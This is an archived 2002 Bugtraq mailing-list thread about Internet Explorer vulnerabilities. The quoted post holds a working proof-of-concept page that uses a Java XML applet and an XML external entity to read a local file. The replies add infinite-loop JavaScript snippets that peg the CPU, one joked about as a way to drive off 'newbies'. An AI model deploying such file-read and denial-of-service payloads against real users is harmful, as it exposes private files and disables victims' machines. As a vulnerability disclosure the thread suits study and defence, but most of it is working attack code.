Thanks to IE's liveconnect features the whole applet should be fully
scriptable, decompiling the applet revealed that there is a public load
(String name) function so you probably can get something like this to work
while (true) {
xmldso.load('myexefile.exe');
}
here's another code snipped that does what you discribe, It served me well
in the past to get rid of newbies asking how to convert a string to an
integer *grin*
<script language="javascript">
while (true) {
try {
pattern = new RegExp("(a?)b(\\1{2})+c","g");
text = "bc";
match = pattern.test(text);
} catch(exception) {
}
}
</script>
----- Original Message -----
From: "Avleen Vig" <lists-bugtraq@silverwraith.com>
To: "Jelmer" <jelmer@kuperus.xs4all.nl>
Cc: <bugtraq@securityfocus.com>
Sent: Saturday, August 17, 2002 8:31 PM
Subject: Re: Internet explorer can read local files
> On Sat, 17 Aug 2002, Jelmer wrote:
>
> > <html>
> > <head>
> > <base href="file:///C:/">
> > </head>
> > <body>
> > <applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0"
id="xmldso"
> > MAYSCRIPT="true">
> > <?xml version="1.0"?>
> > <!DOCTYPE file [
> > <!ELEMENT file (#PCDATA) >
> > <!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
> > ]>
> > <file>
> > &contents;
> > </file>
> > </applet>
> > <script language="javascript">
> > setTimeout("showIt()",2000);
> > function showIt() {
> > var jelmer = xmldso.getDocument();
> > alert(jelmer.Text);
> > }
> > </script>
> > </body>
> > </html>
>
> This is also a short term 100% CPU consumtion vulnerability:
> replace 'file:///C:/jelmer.txt' with the location of any executable file,
> and IE will consume 100% CPU for approximately 30 seconds. During this
> time, task manager (on Win2k SP2 at least) cannot start.
> Closing the IE window does not fix the problem.
> If it were possible to make the script not time out, this would be a
> bigger problem. There's also nothign to stop you spwaning off other
> windows and such to increase the length of time the user if effected.
>
>
>
